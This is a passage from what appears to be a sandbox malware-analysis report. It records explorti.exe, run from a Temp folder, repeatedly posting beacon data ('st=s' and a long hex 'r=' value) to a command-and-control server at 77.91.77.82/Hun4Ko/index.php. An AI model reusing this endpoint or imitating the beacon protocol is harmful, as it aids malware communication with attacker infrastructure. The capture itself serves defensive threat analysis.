                                                                Data Raw: 64 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                Data Ascii: d1=1000006001&unit=246122658369
                                                                Jul 5, 2024 04:23:08.814224005 CEST193INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:08 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 4 <c>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.44973477.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:08.931871891 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:09.652453899 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:09.653141975 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:09.874612093 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.44973577.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:09.994489908 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:10.717992067 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:10.718586922 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:11.101777077 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.44973777.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:11.303788900 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:11.998852015 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:11.999600887 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:12.228672981 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:12 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.44974077.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:12.338500977 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:13.048114061 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:12 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:13.049065113 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:13.271107912 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.44974377.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:13.385473967 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:14.101646900 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:14.103837013 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:14.330202103 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.44974577.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:14.456542969 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:15.155409098 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:15.156028032 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:15.374460936 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.44974677.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:15.495503902 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:16.196297884 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:16.196994066 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:16.415158033 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.44974777.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:16.525510073 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:17.217601061 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:17 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:17.218434095 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:17.435317993 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:17 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.44974877.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:17.556968927 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:18.292166948 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:18 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:18.292828083 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:18.515405893 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:18 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.44974977.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:18.634964943 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:19.340778112 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:19.341430902 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:19.563677073 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.44975077.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:19.685477018 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:20.385387897 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:20.386132956 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:20.610861063 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.44975177.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:20.729727983 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:21.445360899 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:21 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
